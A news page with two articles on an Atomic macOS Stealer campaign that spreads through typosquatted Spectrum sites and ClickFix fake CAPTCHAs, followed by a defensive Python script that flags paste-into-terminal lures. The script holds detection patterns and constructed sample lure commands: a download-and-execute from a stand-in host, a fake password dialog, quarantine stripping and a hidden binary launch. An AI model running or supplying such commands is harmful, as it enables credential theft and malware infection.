Latest news with #KoushikPal


Tom's Guide
10-06-2025
Macs under threat from new malware campaign impersonating major ISP — how to stay safe
Even though people often think Macs are safe from malware, that definitely isn't true. Case in point: a new Atomic Stealer campaign that infects the best MacBooks and other Apple computers with info-stealing malware has been spotted online.

As reported by The Hacker News, the campaign was discovered by the cybersecurity firm CloudSEK, which believes it is the work of Russian-speaking hackers based on comments in the malware's source code. What makes this campaign particularly interesting is that, in addition to typosquatting, it uses social engineering to trick unsuspecting Mac users into running the malware themselves.

For those unfamiliar, typosquatting is a type of attack where cybercriminals register lookalike domains to lay traps for victims who mistype a popular site's URL into their browser's address bar. Victims may think they're on a well-known company's website, but they're actually on a fake site designed to mimic the real one, which is then used to spread malware.

Once a Mac is infected with Atomic Stealer, the malware can steal personal and sensitive data such as passwords stored in the Apple Keychain, browser cookies, login credentials, credit card details and more. Here's everything you need to know about this new campaign, along with some tips to avoid falling victim to it and similar attacks.

According to CloudSEK, the hackers behind this campaign are impersonating the U.S. internet and cable provider Spectrum using a number of fake sites. While Spectrum's official website is spectrum[.]com, the firm's blog post highlights one of these fake sites at panel-spectrum[.]net. Once on this fake site, potential victims are asked to complete a reCAPTCHA to verify that they aren't bots. Since so many sites use this or a similar form of verification, many people won't think twice when asked to check a box to prove they're human.
However, on the fake site shared by CloudSEK, the verification fails, and potential victims are then asked to complete an alternative verification instead. When someone clicks the button that reads 'Alternative Verification', a command is copied to their clipboard without their knowledge. A set of instructions then asks them to open a command prompt, paste the code that was copied to their clipboard and hit 'Enter' to run it on Windows.

If someone is using a Mac, slightly different instructions are shown that lead to the same outcome: their computer is infected with info-stealing malware. On Macs, a malicious shell script is used to steal system passwords and download a variant of the Atomic Stealer malware. As CloudSEK security researcher Koushik Pal points out in the company's report, the script 'uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.'

Given that hackers use all kinds of tricks to lead potential victims to fake sites spreading malware, it's always best to type a company's website into your browser's address bar manually, and to double check that you spelled it correctly. If you don't know a company's official site, you can use a search engine to find it, but be careful not to click the first link you see. On Google and other search engines, the links at the top are often ads, and finding a company's actual website often requires scrolling a bit further down the page. The problem with clicking an ad or sponsored result is that anyone, including hackers, can buy ad space online, and cybercriminals often use malicious ads to send users to fake sites instead of a company's actual site. From here, it's a matter of knowing how to identify a ClickFix attack.
Many sites ask you to complete a reCAPTCHA or other form of verification before entering. However, if a site asks you to open a command window (Terminal on a Mac, Command Prompt on Windows) and paste something from your clipboard before hitting 'Enter', that is a major red flag. A legitimate company might ask you to select all the images containing cars, but it would never copy code to your clipboard without your knowledge and then ask you to paste and run it somewhere else.

Although your Mac comes with built-in security software in the form of Apple's own XProtect, it's still a good idea to consider investing in one of the best Mac antivirus software solutions. Unlike free antivirus software, these paid options are updated more frequently and are more likely to spot newer malware strains like Atomic Stealer.

Given that attacks using the ClickFix technique have proven both successful and profitable for hackers and other cybercriminals, they're not going anywhere anytime soon. This is why it makes sense to educate yourself and your family members about these threats so that you can spot the red flags before your Mac or PC becomes infected with malware.


Forbes
08-06-2025
New Apple Passwords Attack Confirmed — What You Need To Know
New macOS password attack hits Apple users. Although it is far more commonplace to read about password attacks against users of the Windows operating system, or targeting services such as Gmail, the truth of the matter is that nobody is safe from the credential-theft threat, as this newly confirmed Apple password-stealing attack illustrates. Here's what you need to know about the AMOS campaign targeting macOS users.

The latest adversary intelligence report from Koushik Pal, a threat researcher at CloudSEK, warns that a newly identified Atomic macOS Stealer campaign using a previously unknown variant has been observed targeting the Apple operating system. Although this latest and ongoing threat leverages well-known tactics and techniques, such as the ClickFix fake CAPTCHA screen and multi-platform social engineering, the danger it poses to macOS users remains high nonetheless.

Better known as AMOS, this latest variant of the Atomic macOS Stealer has been observed using ClickFix attack sites that impersonate a U.S. support services company operating in the cable TV, internet provision, mobile phone and managed services sectors. The brand impersonation is made possible by typosquatting domains that appear similar to the genuine article. 'The macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,' Pal warned. This script then uses native macOS commands to 'harvest credentials, bypass security mechanisms, and execute malicious binaries.' This is, to be fair, as significant a threat to your Apple passwords as you are going to get.

The campaign targets both consumer and corporate users and highlights a trend in multi-platform social engineering attacks. Pal said that source code comments suggest Russian-speaking cybercriminals are behind the new AMOS campaign.
The AMOS malware utilises legitimate utilities to circumvent endpoint security controls and extract macOS user passwords, which can then be used for lateral movement or sold to initial access brokers for use in other cybercriminal campaigns, including ransomware attacks. By way of mitigation, Pal recommended that users be educated about the tactics used by such Apple password-stealing campaigns, 'especially those disguised as system verification prompts.'
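Both articles above describe the same red flag: a "verification" page silently copies a command to the clipboard and tells the victim to paste it into a terminal, where a shell one-liner harvests credentials, strips security controls and launches a binary. The script below is an added example written for this page, not code from CloudSEK, Tom's Guide or Forbes, showing how a practitioner can triage such a command before it is run. Its indicator list is an assumption based on widely reported ClickFix and macOS info-stealer tradecraft, not the indicators from CloudSEK's report, and every sample command is constructed for the example (the base64 lure is built in code from a harmless `example.invalid` URL). On a Mac it reads the clipboard with `pbpaste`; elsewhere it scores the constructed samples.

```python
"""Heuristic triage of clipboard/terminal commands for ClickFix-style lures.

Added example for this page, not CloudSEK's code. The indicator set is an
assumption drawn from commonly reported ClickFix tradecraft, not report IOCs.
"""
from __future__ import annotations

import base64
import binascii
import re
import shutil
import subprocess
from dataclasses import dataclass, field

# (name, pattern, weight). Weights are arbitrary; tune them for your environment.
INDICATORS = [
    # download-and-execute in one line
    ("remote_pipe_to_shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b"), 5),
    # decode an inline blob and run it, which hides the real command from the victim
    ("base64_decode_exec", re.compile(r"base64\s+(-d|--decode|-D)\b[^|;]*\|\s*(ba|z)?sh\b"), 5),
    # AppleScript password dialog with masked input ("harvest credentials")
    ("password_prompt", re.compile(r"osascript.*with hidden answer"), 4),
    # remove the quarantine flag so Gatekeeper never inspects the download
    ("quarantine_strip", re.compile(r"xattr\s+(-d\s+com\.apple\.quarantine|-c)\b"), 3),
    ("gatekeeper_disable", re.compile(r"spctl\s+--master-disable"), 3),
    # detach so closing the terminal does not kill the payload
    ("background_exec", re.compile(r"\b(nohup|setsid)\b"), 1),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
ALERT_THRESHOLD = 5


@dataclass
class Triage:
    score: int = 0
    hits: list = field(default_factory=list)    # (layer depth, indicator name)
    layers: list = field(default_factory=list)  # decoded base64 layers, in order

    @property
    def suspicious(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def _decode_blobs(text: str) -> list[str]:
    """Return printable strings hidden inside base64-looking tokens of `text`."""
    out = []
    for tok in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary: nothing to rescan
        if decoded and all(c.isprintable() or c in "\n\t" for c in decoded):
            out.append(decoded)
    return out


def triage(command: str, max_depth: int = 2) -> Triage:
    """Score a command the way an analyst eyeballs a ClickFix lure, peeling
    inline base64 layers so an encoded payload is scored like a plain one."""
    result = Triage()
    queue = [(0, command)]
    while queue:
        depth, text = queue.pop(0)
        for name, pattern, weight in INDICATORS:
            if pattern.search(text):
                result.score += weight
                result.hits.append((depth, name))
        if depth < max_depth:
            for decoded in _decode_blobs(text):
                result.layers.append(decoded)
                queue.append((depth + 1, decoded))
    return result


def read_clipboard() -> str | None:
    """macOS only: read what a ClickFix page just copied (pbpaste)."""
    if shutil.which("pbpaste") is None:
        return None
    return subprocess.run(["pbpaste"], capture_output=True, text=True, check=False).stdout


# Constructed samples for this example, not payloads from the campaign.
SAMPLES = {
    "benign_install": "brew install --cask firefox",
    "benign_decode": "echo aGVsbG8= | base64 -d",
    "lure_encoded": "echo "
    + base64.b64encode(b"curl -fsSL http://example.invalid/x.sh | sh").decode()
    + " | base64 -d | sh",
    "lure_macos": 'osascript -e \'display dialog "Verification required" default answer "" '
    "with hidden answer' && xattr -c /tmp/.update && nohup /tmp/.update >/dev/null 2>&1 &",
}

if __name__ == "__main__":
    clip = read_clipboard()
    targets = {"clipboard": clip} if clip else SAMPLES
    for label, cmd in targets.items():
        t = triage(cmd)
        verdict = "SUSPICIOUS" if t.suspicious else "ok"
        print(f"{label:15} score={t.score:2} {verdict} hits={t.hits}")
```

The encoded lure is the interesting case: the outer command only shows `echo ... | base64 -d | sh`, but the decoded layer reveals the `curl ... | sh` download-and-execute, so the two indicators stack to a score of 10 while the harmless `echo aGVsbG8= | base64 -d` scores 0. The thresholds are deliberately crude; the point is that anything a web page asks you to paste into a terminal deserves this kind of look before Enter is pressed.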